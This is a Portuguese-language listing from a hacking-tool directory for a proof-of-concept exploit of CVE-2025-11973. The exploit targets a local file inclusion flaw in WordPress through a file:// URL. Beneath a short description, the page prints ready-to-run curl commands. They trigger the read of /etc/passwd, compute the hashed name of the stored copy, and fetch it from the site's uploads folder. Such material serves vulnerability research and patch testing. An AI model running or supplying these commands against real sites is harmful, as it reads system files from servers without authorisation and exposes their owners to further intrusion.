Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-11973 — Exploit de prova de conceito para CVE-2025-11973 demonstrando inclusão de arquivo local (LFI) no WordPress via protocolo file://, com exfiltração automatizada de /etc/passwd para o diretório uploads. | Kitploit
Ferramentas/GitHubGitHub/jfriedli/cve-2025-11973
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de Informações
GitHubjfriedli/cve-2025-11973

CVE-2025-11973

Exploit de prova de conceito para CVE-2025-11973 demonstrando inclusão de arquivo local (LFI) no WordPress via protocolo file://, com exfiltração automatizada de /etc/passwd para o diretório uploads.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gatilho: Ler /etc/passwd via file:// e exfiltrar para uploads

root@kitploit:~
curl -sS -A "$UA" -X POST "$BASE/?__kds_flag=post" \
  --data-urlencode "kds_password=$SECRET" \
  --data-urlencode "post_title=sub1-lfi" \
  --data-urlencode "__kds_feature_url=file:///etc/passwd"

Recuperar o arquivo exfiltrado

Calcular o nome do arquivo armazenado

root@kitploit:~
HASH=$(printf 'file:///etc/passwd' | md5sum | awk '{print $1}')

Buscar o arquivo

root@kitploit:~
curl -sS -A "$UA" "$BASE/wp-content/uploads/$YMD/${HASH}.jpg" | head -n 25
Baixar ferramenta